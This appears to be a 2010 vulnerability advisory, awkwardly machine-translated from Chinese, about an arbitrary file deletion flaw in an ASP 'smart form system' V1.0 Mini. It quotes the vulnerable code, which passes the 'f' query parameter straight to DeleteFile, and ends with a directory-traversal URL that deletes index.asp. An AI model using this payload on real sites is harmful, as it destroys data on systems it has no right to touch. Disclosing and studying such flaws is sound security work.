Ding peaks of the smart forms system across the directory to delete the file vulnerability-vulnerability warning-the black bar safety net

2010-07-06T00:00:00
ID MYHACK58:62201027497
Type myhack58
Reporter 佚名
Modified 2010-07-06T00:00:00

Description

The impact of the system:peak peak smart form system(ASP) V1. 0 Mini

Defective part: elseif Request. QueryString("action")="del" then 'QueryString transmission, not much to say f=Request. QueryString("f") ‘is the QueryString, get“f”variable if f<>"" then 'determine f whether the null character Set fso=server. createobject("scripting. filesystemobject") fso. DeleteFile Server. MapPath("./ dbbak/"&f) 'directly references the“f” set fso=nothing url_go "deleted successfully!"," db_manage. asp" else url_go "did not find the specified file!"," db_manage. asp" end if

And the following references: <a href="? action=del&f=<%=item. Name%>" onclick="javascript:return confirm('are you sure you want to continue to perform the operation?');"& gt;delete</a>

Made the variable“f”, and f variables is to handle the real file name of the item. The Name is a direct reference to the Server. MapPath("./ dbbak/"&f)

To perform the method of: http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index. the asp